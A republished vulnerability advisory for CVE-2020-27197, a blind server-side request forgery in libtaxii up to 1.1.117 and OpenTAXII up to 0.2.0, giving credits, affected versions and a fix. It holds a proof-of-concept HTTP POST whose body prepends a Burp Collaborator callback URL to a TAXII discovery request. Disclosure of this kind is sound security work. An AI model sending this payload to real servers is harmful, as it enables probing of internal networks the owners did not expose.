Libtaxii 1.1.117 / OpenTaxi 0.2.0 Server-Side Request Forgery
2020-10-22 19:54:37 Author: cxsecurity.com(查看原文) 阅读量:241 收藏

Libtaxii version <= 1.1.117 & OpenTaxi <=0.2.0 Blind SSRF Details ======================================================================================== Product: Security-Risk: High Remote-Exploit: yes Vendor-URL: https://github.com/eclecticiq/OpenTAXII , https://github.com/TAXIIProject/libtaxii CVE-ID: CVE-2020-27197 Credits ======================================================================================== Discovered by: Owais Mehtab & Vijay Kota Kudos: Sergey Polzunov for finding the root cause and pointing out that the issue with Libtaxii <= 1.1.117 Affected Products: ======================================================================================== Libtaxii version <= 1.1.117 OpenTaxi <=0.2.0 Description ======================================================================================== While testing opentaxii platform a blind SSRF issue was identified https://github.com/TAXIIProject/libtaxii/issues/246 https://github.com/eclecticiq/OpenTAXII/issues/176 Proof of Concept ======================================================================================== POST /services/discovery HTTP/1.1 Host: 127.0.0.1:9000 Connection: close Accept-Encoding: gzip, deflate Accept: application/xml User-Agent: Cabby 0.1.20 X-TAXII-Accept: urn:taxii.mitre.org:message:xml:1.1 X-TAXII-Services: urn:taxii.mitre.org:services:1.1 X-TAXII-Content-Type: urn:taxii.mitre.org:message:xml:1.1 X-TAXII-Protocol: urn:taxii.mitre.org:protocol:https:1.0 Content-Type: application/xml Content-Length: XXX http://burp_collaborator_url?<taxii_11:Discovery_Request xmlns:taxii="http://taxii.mitre.org/messages/taxii_xml_binding-1" xmlns:taxii_11="http://taxii.mitre.org/messages/taxii_xml_binding-1.1" xmlns:tdq="http://taxii.mitre.org/query/taxii_default_query-1" message_id="877a5f67-6616-4040-bbc1-5f36efd5a349"/> Solution ======================================================================================== Update libtaxii version to 1.1.118



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2020100145
如有侵权请联系:admin#unsafe.sh